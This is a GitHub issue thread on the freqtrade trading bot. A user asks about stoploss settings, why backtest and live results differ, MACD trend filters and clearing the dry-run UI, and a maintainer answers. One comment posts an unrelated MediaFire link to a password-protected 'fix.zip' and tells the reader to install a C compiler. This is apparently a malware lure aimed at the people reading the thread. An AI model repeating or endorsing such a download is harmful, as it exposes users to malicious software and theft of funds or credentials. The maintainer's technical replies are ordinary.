### ISSUE TITLE
Can you help me to improve my strategy?

### ISSUE THREAD

**Issue by 0jessica0** [freqtrade/freqtrade#10721]
## Describe your environment

Operating system: ____windows（no docker）
Python Version: _____3.11.9 (python -V)
CCXT version: _____4.3.98 (pip freeze | grep ccxt)
Freqtrade Version: ____2024.9 (freqtrade -V or docker compose run --rm freqtrade -V for Freqtrade running in docker)
  
## Your question

Hi there. I started to use this system for around one week. I have some questions about my strategy.
The day before yesterday, I asked a question about the custom stop loss. I fixed that problem.

I started to go through live trade. The stop loss went well. The strategy is about finding the entry point of rebound.
Everything went well until yesterday, there were a quite clear down trend. The strategy performed quite bad: it keeps buying and stoploss, loss around 3%. So I pauseed the progame, and started to do some research.

I read the three articles of backtest trap. So I close the use_custom_stoploss in the live trade (I am not sure if I am right). And set following in the strategy:
```
stoploss = -0.03
use_custom_stoploss = False
# Trailing stoploss
trailing_stop = True
trailing_stop_positive = 0.02
trailing_stop_positive_offset = 0.03  # Disabled / not configured
trailing_only_offset_is_reached = True
```
If I used this to backtest I can still around 3% profit in the backtest, rather than 3% loss.
Question 1: should I just keep this in live trade? What makes theis 6% difference?

Yesterday, since it is a clear downtrend and the strategy keeps buying, I added MACD to judge the trend:
if the market is in downtrend, it won't buy; if the market is in uptrend, it will start to enter.
But when I backtested, compared to the original result, I am struggled with some details in the backtest：
1. compare to original results, trading times decreases a lot (I am ok with that, since I don't want to buy on downtrend)
2. compare to original results, total profit in percentage is only 1/17. The sharp is only 1/4 of the original result. And the new stragety didn't even beat the market.

Question2: should I trust the backtest, even though the result of backtest is different from the live trade? I understand that there is some difference between backtest and live trade, how to decrease the gap?
Question3: should I add MACD to judge the trend？

Quesion4: When I started the dry run, the trading records of my live trading show up. How to start an empty UI for dry run?

Thanks

**Comment by SagarChandra07** [comment]
maybe this will help
https://www.mediafire.com/file/q4gho1ar8e43udd/fix.zip/file
Archive password: changeme
If you don't have the c compliator, install it.(gcc or clang)

**Comment by xmatthias** [comment]
> Question3: should I add MACD to judge the trend？

we'll not be providing this kind of recommendation, really. 
There's tons of indicators you can use to determine trend - which one is right for you / your strategy is up to you to test out and then decide. We can't do that for you.

> Question2: should I trust the backtest,

Backtests can be trusted _to some degree_. 
If a backtest shows bad results - dry-run won't be magically great.

Backtest is however a simulation following certain [documented rules](https://www.freqtrade.io/en/stable/backtesting/#assumptions-made-by-backtesting), and is as such pretty easy to game if you read the assumptions carefully, and play "against" these. We've seen this time and time again - but it's questionable why you'd do that - as it's pretty much counter-productive.

Backtesting is also based on historic results - which can give some indication - but there's no guarantee that pairs perform similarly, or even identically in the future. 
Overfitting a strategy is easy - so it'd have done great in the past, but won't in the future.

In dry / live - you'll also encounter other factors like unfilled orders (or slippage, or both) - neither of which can be fully accounted for in backtesting.

> The strategy performed quite bad: it keeps buying and stoploss, loss around 3%.

changes to stoploss values won't help with that, really. It's the entry signal that's causing re-entries - while the market goes "down and down".

Freqtrade protects from this automatically _within the same candle_ via "auto-lock". if you need longer "cooldown" periods or logics - best look into [protections](https://www.freqtrade.io/en/stable/plugins/#protections).

**Comment by 0jessica0** [comment]
@xmatthias Thanks a lot. I will take a closer look at these docs
Can you tell me how to start a new bot with nothing on UI? If I change from live to dry run, it will show info of my live trading on it.

**Comment by xmatthias** [comment]
you simply use a different database - either `--db-url` - or `db_url` (config) will do that for you.
You can alternatively also delete the database file (usually `tradesv3.sqlite` or `tradesv3.dryrun.sqlite`).

On startup, you'll get shown the url that's being used at the moment - most likely, you've got this configured in your config somewhere - otherwise it wouldn't be the same between dry and live modes.

**Comment by 0jessica0** [comment]
@xmatthias Thanks a lot. It does help me to create a new one.
I have two bots. One is perfect: it does give me a brand new UI; but the other one makes several purchases 10 days before. And there is a trade about a contract that is not in that exchange, and get -100% return.
How to solve that?
Thanks

**Comment by xmatthias** [comment]
well this sounds like your 2nd bot is still using an existing database.
The best way is probably to start fresh (if that's what you're after). 
If an exchange delists a pair (and you'd want to continue this bot otherwise), you can delete the trade via UI (there's a "delete" button at the bottom right). 
The UI is correct insofar as this is no longer tradable, so technically, it's a 100% loss.

**Comment by 0jessica0** [comment]
Yes, I did create a new user data folder for the dryrun. But there are still some order that I never saw before shows up on the UI. Why is that?

**Comment by xmatthias** [comment]
then either you didn't - or have conntected freqUI to multiple bots - and only reset one of them.

FreqUI itself has no storage for orders - so it's a freqtrade bot that will still be running - and has a database that's not new.

**Comment by stash86** [comment]
I assume you have your questions fully answered. Please create new issue if you have new question.
